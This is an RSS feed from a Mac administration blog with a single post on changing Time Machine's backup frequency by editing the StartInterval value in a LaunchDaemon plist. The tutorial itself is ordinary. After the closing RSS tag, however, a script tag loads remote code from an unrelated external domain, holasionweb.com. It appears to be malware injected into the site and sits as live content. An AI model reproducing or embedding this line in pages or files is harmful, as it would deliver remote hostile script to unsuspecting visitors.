<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; Backup Frequency</title>
	<atom:link href="http://krypted.com/tag/backup-frequency/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Changing Time Machine Backup Frequency</title>
		<link>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/</link>
		<comments>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 04:01:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[alter]]></category>
		<category><![CDATA[Backup Frequency]]></category>
		<category><![CDATA[com.apple.backupd-auto.plist]]></category>
		<category><![CDATA[Time Machine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4048</guid>
		<description><![CDATA[Time Machine just does what it does and there&#8217;s not much controlin&#8217; it aside from what&#8217;s in the System Preference pane. Â Or is there? Â Earlier, I covered how to disable the disk check feature, now let&#8217;s look at how to change the frequency of when backups occur. Â Backups are initiated by com.apple.backupd-auto.plist, stored inÂ /System/Library/LaunchDaemons. Â The [...]]]></description>
			<content:encoded><![CDATA[<p>Time Machine just does what it does and there&#8217;s not much controlin&#8217; it aside from what&#8217;s in the System Preference pane. Â Or is there? Â Earlier, I covered how to disable the disk check feature, now let&#8217;s look at how to change the frequency of when backups occur. Â Backups are initiated by com.apple.backupd-auto.plist, stored inÂ /System/Library/LaunchDaemons. Â The contents of this file are, by default:</p>
<blockquote><p>&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;<br />
&lt;!DOCTYPE plist PUBLIC &#8220;-//Apple Computer//DTD PLIST 1.0//EN&#8221; &#8220;http://www.apple.com/DTDs/PropertyList-1.0.dtd&#8221;&gt;<br />
&lt;plist version=&#8221;1.0&#8243;&gt;<br />
&lt;dict&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;Label&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;string&gt;com.apple.backupd-auto&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;ProgramArguments&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;array&gt;<span style="white-space: pre;"> </span>&lt;string&gt;/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;string&gt;-auto&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;/array&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;StartInterval&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;integer&gt;3600&lt;/integer&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;RunAtLoad&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;false/&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;KeepAlive&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;false/&gt;<br />
&lt;/dict&gt;<br />
&lt;/plist&gt;</p></blockquote>
<p>The StartInterval integer controls the frequency with which backups occur, in seconds. Â You can customize this by altering the data in the line below (the integer). Â For example, if you set it to 360 then backups will occur every 6 minutes instead of 60, or more likely, if you set the integer to 14400 then your backups will occur every 4 hours instead of every hour.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">/System/Library/LaunchDaemons/com.apple.backupd-attach.plist</div>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/" rel="bookmark" title="June 29, 2009">Suppressing Time Machine on Disk Mount</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-server-105-using-natd-to-turn-the-server-into-a-router/" rel="bookmark" title="August 12, 2008">Mac OS X Server 10.5: Using NATd to turn the Server into a Router</a></li>
<li><a href="http://krypted.com/mac-os-x/creating-a-launchagent/" rel="bookmark" title="May 17, 2007">Creating a LaunchAgent</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-solidifying-the-top-menu-bar/" rel="bookmark" title="November 13, 2007">Mac OS X 10.5: Solidifying the Top Menu Bar</a></li>
<li><a href="http://krypted.com/mac-os-x/disable-disk-arbitration/" rel="bookmark" title="June 28, 2009">Disable Disk Arbitration</a></li>
</ul>
<p><!-- Similar Posts took 7.232 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>